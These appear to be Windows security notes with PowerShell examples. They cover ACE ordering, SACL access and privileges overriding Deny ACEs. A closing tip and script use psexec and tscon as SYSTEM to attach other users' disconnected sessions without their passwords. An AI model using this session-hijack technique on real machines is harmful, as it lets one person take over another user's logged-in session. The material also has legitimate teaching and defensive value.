1. Pass the hash mitigation:
A security descriptor is the lock (the access token is the key): it defines who has which access to a securable object. It contains the owner (and primary group), the DACL (the actual permission list) and the SACL (the auditing entries).
The DACL can be changed by the owner or by anyone holding the WRITE_DAC right (part of "Full Control"); the SACL can be changed only by a holder of the privilege "Manage auditing and security log" (SeSecurityPrivilege), which by default is granted to the local Administrators group.
ACEs are evaluated from the top down, and the canonical order puts explicit (set on the object) ACEs above inherited ones, with Deny above Allow inside each group: explicit Deny, explicit Allow, inherited Deny, inherited Allow.
So a Deny always wins over an Allow at the same level (explicit over explicit, inherited over inherited), but an Allow set directly on the object beats a Deny the object merely inherits from its parent, because the check stops as soon as every requested right has been granted.
Privileges beat permissions, because an enabled privilege in the token is honoured before the DACL is consulted.
Even if a domain admin sets a Deny ACE for "Take ownership" against a local admin, the local admin still holds the privilege "Take ownership of files and other objects" (SeTakeOwnershipPrivilege, granted to Administrators by default) and can take ownership anyway; the privilege only has to be enabled in the token, which tools such as takeown.exe do themselves.
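The points above (owner/DACL/SACL, canonical ACE order, explicit Deny beating an inherited Allow, SACL access needing SeSecurityPrivilege, and a privilege beating an explicit Deny), as an added PowerShell example that is not part of the original post. It assumes a scratch folder under $env:TEMP, the well-known BUILTIN\Users (S-1-5-32-545) and BUILTIN\Administrators (S-1-5-32-544) groups, and that the account running it is a member of Users (true for ordinary local and domain accounts); the ownership step only runs in an elevated session, because SeTakeOwnershipPrivilege is present only in the elevated token.

```powershell
# Added example, not from the original post. Creates a scratch folder and file,
# sets an inherited Allow on the folder and an explicit Deny on the file, then
# shows owner, DACL order, SACL access and (if elevated) a privilege beating a
# Deny ACE. Everything it creates lives under $env:TEMP and is removed at the end.

$base = Join-Path $env:TEMP ("acl-demo-" + [guid]::NewGuid().ToString('N'))
New-Item -ItemType Directory -Path $base | Out-Null
$file = Join-Path $base 'secret.txt'
Set-Content -Path $file -Value 'constructed sample content'   # constructed test data

# Assumed test principals: BUILTIN\Users and BUILTIN\Administrators (well-known SIDs).
$users  = [System.Security.Principal.SecurityIdentifier]'S-1-5-32-545'
$admins = [System.Security.Principal.SecurityIdentifier]'S-1-5-32-544'
$ruleType = 'System.Security.AccessControl.FileSystemAccessRule'

try {
    # 1. Inherited Allow: Read on the folder, flowing down to files and subfolders.
    $dirAcl = Get-Acl -Path $base
    $allow  = New-Object $ruleType -ArgumentList $users, 'Read', 'ContainerInherit,ObjectInherit', 'None', 'Allow'
    $dirAcl.AddAccessRule($allow)
    Set-Acl -Path $base -AclObject $dirAcl

    # 2. Explicit Deny on the file. Only ReadData is denied (not ReadPermissions, i.e.
    #    READ_CONTROL), so the descriptor itself can still be read with Get-Acl.
    $fileAcl = Get-Acl -Path $file
    $deny    = New-Object $ruleType -ArgumentList $users, 'ReadData', 'Deny'
    $fileAcl.AddAccessRule($deny)
    Set-Acl -Path $file -AclObject $fileAcl

    # 3. Owner and the DACL in stored (canonical) order:
    #    explicit Deny, explicit Allow, then the inherited ACEs.
    $sd = Get-Acl -Path $file
    "Owner: $($sd.Owner)"
    $sd.Access |
        Select-Object IdentityReference, AccessControlType, FileSystemRights, IsInherited |
        Format-Table -AutoSize

    # The explicit Deny for Users sits above the inherited Allows, including the
    # running account's own inherited Full Control from the profile folder, so any
    # member of Users is refused the read.
    try {
        Get-Content -Path $file -ErrorAction Stop | Out-Null
        'Read succeeded (the running account is not a member of Users)'
    } catch {
        "Read denied by the explicit Deny ACE: $($_.Exception.Message)"
    }

    # 4. SACL: reading it needs SeSecurityPrivilege (Manage auditing and security log),
    #    which a non-elevated token does not have, so Get-Acl -Audit fails there.
    try {
        $audit = (Get-Acl -Path $file -Audit -ErrorAction Stop).Audit
        "SACL readable, $($audit.Count) audit entries"
    } catch {
        "SACL not readable without SeSecurityPrivilege: $($_.Exception.Message)"
    }

    # 5. Privilege beats permission: deny TakeOwnership to Administrators on the file,
    #    then take ownership anyway. takeown.exe enables SeTakeOwnershipPrivilege, which
    #    is honoured before the DACL is consulted; /A assigns the Administrators group
    #    as owner so the change is visible even if the runner already owned the file.
    $identity = [Security.Principal.WindowsIdentity]::GetCurrent()
    $elevated = ([Security.Principal.WindowsPrincipal]$identity).IsInRole(
                    [Security.Principal.WindowsBuiltInRole]::Administrator)
    if ($elevated) {
        $fileAcl  = Get-Acl -Path $file
        $denyOwn  = New-Object $ruleType -ArgumentList $admins, 'TakeOwnership', 'Deny'
        $fileAcl.AddAccessRule($denyOwn)
        Set-Acl -Path $file -AclObject $fileAcl
        takeown /F $file /A | Out-Null
        "Owner after takeown, despite the Deny ACE on TakeOwnership: $((Get-Acl -Path $file).Owner)"
    } else {
        'Not elevated: skipping the SeTakeOwnershipPrivilege step (the privilege is only in the elevated token).'
    }
}
finally {
    # Delete needs only the DELETE right, which nothing above denied.
    Remove-Item -Path $base -Recurse -Force -ErrorAction SilentlyContinue
}
```

Run it once as a standard user and once from an elevated prompt: the first run shows the Deny winning over the inherited Allow and the SACL being unreadable, the second additionally shows the owner changing to BUILTIN\Administrators even though the DACL explicitly denies TakeOwnership to that group.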
Tip for connecting to a user's disconnected session: start taskmgr as SYSTEM (for example psexec -s -i taskmgr.exe), open the Users tab, right-click the disconnected session and choose Connect; running as SYSTEM you will not be asked for that user's password. The same thing from a SYSTEM command prompt is tscon <session id> /dest:console.
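The session-hijack tip above, as an added PowerShell example that is not part of the original post: it parses the output of "query user" to find disconnected sessions and builds the tscon command line for each. The sample output embedded in it is constructed, not captured from a real host; in real use the live output of query user is fed to the same function from a SYSTEM shell (for example psexec -s -i powershell.exe), because only then does tscon skip the password prompt.

```powershell
# Added example, not from the original post. Finds disconnected sessions in
# "query user" output and prints the tscon command that attaches each one to
# the console. Must be run from a SYSTEM shell for tscon to work without a password.

function Get-UserSession {
    param([string[]]$QueryOutput)
    # "query user" columns: USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME.
    # SESSIONNAME is blank for disconnected RDP sessions, hence the optional group.
    # A leading ">" marks the session the command itself runs in.
    $pattern = '^\s*>?(?<user>\S+)\s+(?<session>\S+)?\s+(?<id>\d+)\s+(?<state>\w+)'
    foreach ($line in $QueryOutput) {
        if ($line -match $pattern) {
            [pscustomobject]@{
                User    = $Matches['user']
                Session = [string]$Matches['session']   # '' when the group did not match
                Id      = [int]$Matches['id']
                State   = $Matches['state']              # Active, Disc, Conn, ...
            }
        }
    }
}

function Get-DisconnectedSession {
    param([string[]]$QueryOutput)
    Get-UserSession -QueryOutput $QueryOutput | Where-Object State -eq 'Disc'
}

# Constructed sample of "query user" output (not captured from a real host).
$sample = @'
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>alice                 console             1  Active      none   1/2/2024 9:00 AM
 bob                                       2  Disc         35   1/2/2024 8:00 AM
 carol                 rdp-tcp#7           3  Active       12   1/2/2024 8:30 AM
'@ -split "`r?`n"

$disc = Get-DisconnectedSession -QueryOutput $sample
$disc | Format-Table -AutoSize       # expected: bob, session '', id 2, state Disc

# Real use from a SYSTEM shell: parse the live output instead of the sample.
# $disc = Get-DisconnectedSession -QueryOutput (query user)
foreach ($s in $disc) {
    # tscon reattaches the session to the console; as SYSTEM no password is asked.
    "tscon $($s.Id) /dest:console    # attaches $($s.User)'s disconnected session"
}
```

Running the printed tscon line as SYSTEM attaches the disconnected session to the console without the user's password, which is exactly what the taskmgr Connect button does under the hood.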